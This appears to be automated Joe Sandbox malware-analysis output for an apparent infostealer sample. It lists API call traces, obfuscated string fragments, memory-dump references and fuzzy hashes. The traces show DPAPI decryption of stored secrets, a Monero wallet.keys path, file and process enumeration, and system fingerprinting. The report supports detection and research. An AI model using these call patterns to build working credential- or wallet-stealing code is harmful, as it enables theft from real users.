                              • FindClose.KERNEL32(000000FF), ref: 00FBDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: d185a6a3605c785c718d3dbf2c0eb0d4a02fea9a85d7109c384bdf09fde5b6f5
                              • Instruction ID: 781241dea92b82b6a6f0ef1d4f8178c7771ebbae33a5db5e012e729e6c950df2
                              • Opcode Fuzzy Hash: d185a6a3605c785c718d3dbf2c0eb0d4a02fea9a85d7109c384bdf09fde5b6f5
                              • Instruction Fuzzy Hash: 6F9133729001099BCB14FB70ED57EED737DAF84304F40866CB81A96185FE38AB599F92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ))hS$6z;:$E8c9$RP1V$YE[7$]OsK$e>?N$e>?N
                              • API String ID: 0-3514759201
                              • Opcode ID: 6cc4acb19336368849e6e086037920873febc0869d76b718f2e4b97bd2bc8227
                              • Instruction ID: 66cac64d02e8ef3a3b72486f641f2c4c01b05079da82204eb0ab4e09bd5e9cc2
                              • Opcode Fuzzy Hash: 6cc4acb19336368849e6e086037920873febc0869d76b718f2e4b97bd2bc8227
                              • Instruction Fuzzy Hash: 86B229F360C2109FE304AE2DEC8567AB7E9EFD8720F16463DEAC5C7744EA3558018696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: (_$+}r7$:x;f$K|w]$Q |;$Ve_O$f2r?$Wz
                              • API String ID: 0-1382138061
                              • Opcode ID: 2161ea397cfa6be472f39b284c4f60c68704e13b33a45579b7249a7c857ef3ff
                              • Instruction ID: 5f7b7b2f1e05acd128a38de5cd6ed8759cee19c1c89c4d479ebe763b0c33a915
                              • Opcode Fuzzy Hash: 2161ea397cfa6be472f39b284c4f60c68704e13b33a45579b7249a7c857ef3ff
                              • Instruction Fuzzy Hash: C1B206F3A08204AFD3046E2DEC8567AFBE9EF94360F1A493DE6C4C3744E63598458697
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00FD05AF), ref: 00FC7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00FC7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00FC7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00FC7C62
                              • LocalFree.KERNEL32(00000000), ref: 00FC7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 9e244e51b4f222332789c97875b9d8c26c2016ab79872bb70a1de21956ad4784
                              • Instruction ID: 260bee2255410e70c51aa9a7413246aa9d396ff66130991b575cf0e990f59ab0
                              • Opcode Fuzzy Hash: 9e244e51b4f222332789c97875b9d8c26c2016ab79872bb70a1de21956ad4784
                              • Instruction Fuzzy Hash: 4741287194021DABCB24EB94DD9AFEEB374FF44704F204199E40A62280DB786E85DFA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1Ss$CDwi$V?~$cn$|r'$}V=$y6
                              • API String ID: 0-1240672472
                              • Opcode ID: 2e833cfbcbe0ca32d1e319ab7ed37ba3ebb8ad05ac2096a2df49cbc2c28b2498
                              • Instruction ID: 8841d4a10be001472760665c40cf8e44207c17232714bfef9b7e7d6d20b94ff1
                              • Opcode Fuzzy Hash: 2e833cfbcbe0ca32d1e319ab7ed37ba3ebb8ad05ac2096a2df49cbc2c28b2498
                              • Instruction Fuzzy Hash: 78B24BF3A082109FE704AE2DEC8577ABBDAEFD4760F1A463DEAC4C3744E53558058692
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #z>$0L^g$Ao[$Pgh$@>9$Ki$|}
                              • API String ID: 0-3120634388
                              • Opcode ID: 5649b266c3f81ee6bb9ff597a53abb357586505ac0a18af3c0a5a2c102b6d3ad
                              • Instruction ID: 49ffffac6d890bd2f76d7e26151597dc88383c99630bdf025c0fae23631e28de
                              • Opcode Fuzzy Hash: 5649b266c3f81ee6bb9ff597a53abb357586505ac0a18af3c0a5a2c102b6d3ad
                              • Instruction Fuzzy Hash: F9B218F360C2049FE704AE2DEC8577ABBE5EB94320F1A893DE6C4C7744E63598058697
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00FD0D73), ref: 00FBE4A2
                              • StrCmpCA.SHLWAPI(?,00FD14F8), ref: 00FBE4F2
                              • StrCmpCA.SHLWAPI(?,00FD14FC), ref: 00FBE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: a51d0747d230651e89888983a3afca229691636028b58f4fa7167105c69008ac
                              • Instruction ID: 96b60b4fbba8590df5cec64286f08ba594b34628a92ccd20b1e02c87bbb87fea
                              • Opcode Fuzzy Hash: a51d0747d230651e89888983a3afca229691636028b58f4fa7167105c69008ac
                              • Instruction Fuzzy Hash: 3412197191011D9BDB28FB60DE97FED7339AF54304F4041ADA50A921C1EE386F49EBA2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FBC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FBC87C
                              • lstrcat.KERNEL32(?,00FD0B46), ref: 00FBC943
                              • lstrcat.KERNEL32(?,00FD0B47), ref: 00FBC957
                              • lstrcat.KERNEL32(?,00FD0B4E), ref: 00FBC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FB724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FB7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00FB72A4
                              • LocalFree.KERNEL32(?), ref: 00FB72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FC961E
                              • Process32First.KERNEL32(00FD0ACA,00000128), ref: 00FC9632
                              • Process32Next.KERNEL32(00FD0ACA,00000128), ref: 00FC9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 00FC965C
                              • CloseHandle.KERNEL32(00FD0ACA), ref: 00FC967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00FD05B7), ref: 00FC86CA
                              • Process32First.KERNEL32(?,00000128), ref: 00FC86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 00FC86F3
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • CloseHandle.KERNEL32(?), ref: 00FC8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00FB5184,40000001,00000000,00000000,?,00FB5184), ref: 00FC8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9B2A
                              • LocalFree.KERNEL32(?,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 944177e60116a878dbdee1fb2e4cb638177bd0972e9663fbf71992ede0d5eb4b
                              • Instruction ID: 82f8e0466e02146078c0a395dc1ffbff9bc7ee27db2dd1231eed1e5fb243fe1b
                              • Opcode Fuzzy Hash: 944177e60116a878dbdee1fb2e4cb638177bd0972e9663fbf71992ede0d5eb4b
                              • Instruction Fuzzy Hash: 5411D4B4640308AFEB14CF64D895FAA77B5FB89711F208058FA199B384C7B5AA41DB50
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00FD0E00,00000000,?), ref: 00FC79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00FD0E00,00000000,?), ref: 00FC79C4
                              • wsprintfA.USER32 ref: 00FC79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 9edfeadedf7116bbb71736a5ec7140ddbb1ba25c7b5ceca93f5c8c42119600b6
                              • Instruction ID: abb2522baa352b03ee18435a3ddb9ff8751aee81601f36bf2160db9f20d04bbc
                              • Opcode Fuzzy Hash: 9edfeadedf7116bbb71736a5ec7140ddbb1ba25c7b5ceca93f5c8c42119600b6
                              • Instruction Fuzzy Hash: 5F1118B2904118ABCB149FC9E945BBEB7F8FB48B12F10411EF615A2284E27D5940DBB0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00DEDE48,00000000,?,00FD0E10,00000000,?,00000000,00000000), ref: 00FC7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00DEDE48,00000000,?,00FD0E10,00000000,?,00000000,00000000,?), ref: 00FC7A7D
                              • wsprintfA.USER32 ref: 00FC7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 847390a7aaf17ea5a6bef17092cadc7def10044efae10b7620163568e96266b4
                              • Instruction ID: 1d26a461e3dad02a6200a9d6a5d330df98c7769959729deab5526af30c5972da
                              • Opcode Fuzzy Hash: 847390a7aaf17ea5a6bef17092cadc7def10044efae10b7620163568e96266b4
                              • Instruction Fuzzy Hash: 4F11CEB1905218EBEB209B54DD4AFA9B778FB40721F0003AAE91A932C0D7785E80CF51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: '/w$8/U^$`&~o
                              • API String ID: 0-3578237245
                              • Opcode ID: f48ebf5990ab7d2c3ca27733ed6b1de0fc2d8f35634134b52c2bfb519e19c562
                              • Instruction ID: c0400d7b092660f0e5959f04849372eb035db8a1d2ee9800ef39bfab977ccc5b
                              • Opcode Fuzzy Hash: f48ebf5990ab7d2c3ca27733ed6b1de0fc2d8f35634134b52c2bfb519e19c562
                              • Instruction Fuzzy Hash: 0DB24AF3A0C2149FE3046E2DEC8567ABBE9EF94320F1A493DEAC4D7744E93558048697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: IPW$n"{[$co
                              • API String ID: 0-2021754632
                              • Opcode ID: a90cf6ee601b705b5783da4630246348772737dc08a73d5a8151e9b0fd5470f5
                              • Instruction ID: bb6bb217ccea7c9fa653d6c5581c64939232e75d20e8448f30d76d28ba033870
                              • Opcode Fuzzy Hash: a90cf6ee601b705b5783da4630246348772737dc08a73d5a8151e9b0fd5470f5
                              • Instruction Fuzzy Hash: DBB227F360C2009FE308AE29DC9567AFBE9EF94320F16853DEAC5C7744EA3558018796
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: oj$%?{$m}
                              • API String ID: 0-2207495541
                              • Opcode ID: 8a59c3dae3f210606e7bd0afe4dee5086f5b9e1ae921c59cfd6f46bf5d589eff
                              • Instruction ID: f917f3113629ba1abb87c19c51506def9054ad3761e75d364c3eba963029b708
                              • Opcode Fuzzy Hash: 8a59c3dae3f210606e7bd0afe4dee5086f5b9e1ae921c59cfd6f46bf5d589eff
                              • Instruction Fuzzy Hash: E0B215F3A0C2049FE704AE2DDC8567ABBE5EF94320F1A493DEAC5C3744E63598118697
                              APIs
                              • CoCreateInstance.COMBASE(00FCE118,00000000,00000001,00FCE108,00000000), ref: 00FC3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00FC37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 3fee4f85101735891f15b6fe2eb5a50996a08631f0d8e4736030fc5681a33f2a
                              • Instruction ID: 13c2001ec7d0fb49eb898b13b22927a8e553bc26dbcc49ec22175522bb666751
                              • Opcode Fuzzy Hash: 3fee4f85101735891f15b6fe2eb5a50996a08631f0d8e4736030fc5681a33f2a
                              • Instruction Fuzzy Hash: F2410771A00A289FDB24DB58CC85F9BB7B4BB48302F4081D8E608A72D0D771AEC5CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FB9BA3
                              • LocalFree.KERNEL32(?), ref: 00FB9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                               • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
